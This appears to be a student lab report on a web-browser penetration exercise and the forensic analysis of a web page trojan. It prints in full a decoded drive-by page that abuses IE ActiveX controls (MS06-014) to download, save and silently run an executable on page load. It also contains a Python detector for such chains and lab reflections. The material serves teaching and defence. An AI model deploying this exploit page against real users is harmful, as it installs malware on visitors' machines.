<html><head><title></title><script language="javascript">function UAFxWqWengBBDyjOGgur(o,n){var r=null;try{eval("r=o.CreateObject(n)")}catch(e){}if(!r){try{eval("r=o.CreateObject(n,'')")}catch(e){}}if(!r){try{eval("r=o.CreateObject(n,'','')")}catch(e){}}if(!r){try{eval("r=o.GetObject('',n)")}catch(e){}}if(!r){try{eval("r=o.GetObject(n,'')")}catch(e){}}if(!r){try{eval("r=o.GetObject(n)")}catch(e){}}return(r)}function DG(a){var s=UAFxWqWengBBDyjOGgur(a,"WScript.Shell");var o=UAFxWqWengBBDyjOGgur(a,"ADODB.Stream");var e=s.Environment("Process");var url=document.location+'/payload';var xml=null;var bin=e.Item("TEMP")+"\\dMioq.exe";var dat;try{xml=new XMLHttpRequest()}catch(e){try{xml=new ActiveXObject("Microsoft.XMLHTTP")}catch(e){xml=new ActiveXObject("MSXML2.ServerXMLHTTP")}}if(!xml){return(0)}xml.open("GET",url,false);xml.send(null);dat=xml.responseBody;o.Type=1;o.Mode=3;o.Open();o.Write(dat);o.SaveToFile(bin,2);s.Run(bin,0)}function qzOYiUnpVxKmDjXQZFuOEI(){var i=0;var t=new Array('{BD96C556-65A3-11D0-983A-00C04FC29E36}','{BD96C556-65A3-11D0-983A-00C04FC29E30}','{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}','{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}','{6414512B-B978-451D-A0D8-FCFDF33E833C}','{06723E09-F4C2-43c8-8358-09FCD1DB0766}','{639F725F-1B2D-4831-A9FD-874847682010}','{BA018599-1DB3-44f9-83B4-461454C84BF8}','{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}','{E8CCCDDF-CA28-496b-B050-6C07C962476B}','{AB9BCEDD-EC7E-47E1-9322-D4A210617116}','{0006F033-0000-0000-C000-000000000046}','{0006F03A-0000-0000-C000-000000000046}',null);while(t[i]){var a=null;if(t[i].substring(0,1)=='{'){a=document.createElement("object");a.setAttribute("classid","clsid:"+t[i].substring(1,t[i].length-1))}else{try{a=new ActiveXObject(t[i])}catch(e){}}if(a){try{var b=UAFxWqWengBBDyjOGgur(a,"WScript.Shell");if(b){DG(a);return(0)}}catch(e){}}i++}}</script></head><body onload='qzOYiUnpVxKmDjXQZFuOEI()'>duafIlNMYJKjSFkKtmGeHvJxh</body></html>


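Searching online for BD96C556-65A3, a string likely to carry information about the attack, gives the following results:

[Screenshots: search results]

From this we can conclude that the attacker exploited the MS06-014 vulnerability.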
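To make this attribution step repeatable, the following added example (not from the original report) pulls CLSIDs and download-and-run indicators out of a decoded page. The first sample is abridged from the decoded page in this report and trimmed to the strings the checks look at; the lookup table holds only the CLSID-to-MS06-014 mapping the report arrives at, and the function and field names are assumptions of this example.

```python
import re

CLSID_RE = re.compile(r"[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}")
# Adjacent string literals joined with "+", used to split a CLSID across two strings.
JOIN_RE = re.compile(r"""["']\s*\+\s*["']""")
# Only the mapping this report arrives at; the CLSID is the RDS.DataSpace control.
KNOWN_CLSIDS = {"BD96C556-65A3-11D0-983A-00C04FC29E36": "MS06-014"}
# One pattern per stage of the download-and-run chain in the decoded page.
STAGES = {
    "shell_object": re.compile(r"""["']WScript\.Shell["']""", re.I),
    "stream_object": re.compile(r"""["']ADODB\.Stream["']""", re.I),
    "download": re.compile(r"XMLHttpRequest|XMLHTTP", re.I),
    "write_file": re.compile(r"\.SaveToFile\s*\(", re.I),
    "execute": re.compile(r"\.Run\s*\(", re.I),
}
DROPPED_RE = re.compile(r"""["'](?:\\\\)?([\w.-]+\.exe)["']""", re.I)

def triage(page):
    """Summarise what a decoded page instantiates, writes and runs."""
    joined = JOIN_RE.sub("", page)            # undo 'clsid:aaaa'+'bbbb' splitting
    clsids = []
    for guid in CLSID_RE.findall(joined):
        guid = guid.upper()
        if guid not in clsids:                # keep first-seen order, no duplicates
            clsids.append(guid)
    stages = [name for name, rx in STAGES.items() if rx.search(page)]
    return {
        "clsids": clsids,
        "advisories": sorted({KNOWN_CLSIDS[c] for c in clsids if c in KNOWN_CLSIDS}),
        "stages": stages,
        "dropped": sorted(set(DROPPED_RE.findall(page))),
        # All five stages together mean: fetch a binary, save it, execute it.
        "drive_by_chain": len(stages) == len(STAGES),
    }

# Abridged from the decoded page in this report; helper names shortened, not runnable.
DECODED_PAGE = r"""
<script>function DG(a){var s=mk(a,"WScript.Shell");var o=mk(a,"ADODB.Stream");
var bin=e.Item("TEMP")+"\\dMioq.exe";xml=new ActiveXObject("Microsoft.XMLHTTP");
xml.open("GET",url,false);o.Write(xml.responseBody);o.SaveToFile(bin,2);s.Run(bin,0)}
var t=new Array('{BD96C556-65A3-11D0-983A-00C04FC29E36}','{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}',null);
a.setAttribute("classid","clsid:"+t[i].substring(1,t[i].length-1))</script>
"""

# Constructed sample: a plugin embed whose CLSID is split across two literals.
PLUGIN_EMBED = "var c='clsid:d27cdb6e-ae6d-11'+'cf-96b8-444553540000';"

if __name__ == "__main__":
    for name, page in (("decoded page", DECODED_PAGE), ("plugin embed", PLUGIN_EMBED)):
        print(name, triage(page))
```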

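III. Problems encountered during the study and their solutions

  • Problem: the Win2k machine could not be pinged
  • Solution: reconfigured the virtual machine's IP address to be obtained automatically and rebooted, after which it connected to the network successfully

IV. Practice summary

Through this practice, I carried out a web browser penetration attack and the forensic analysis of a web page trojan, among other things, and came to understand that a web page trojan is really just an HTML page; what sets it apart from other pages is that it has been carefully crafted by a hacker, and a user who visits it gets infected with the trojan. I also got a sense of the harm done by web trojans and phishing sites, and improved my hands-on skills. Overall, this lab was not easy and required calm, patient work. I hope to further improve my practical network attack-and-defense skills in future study.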
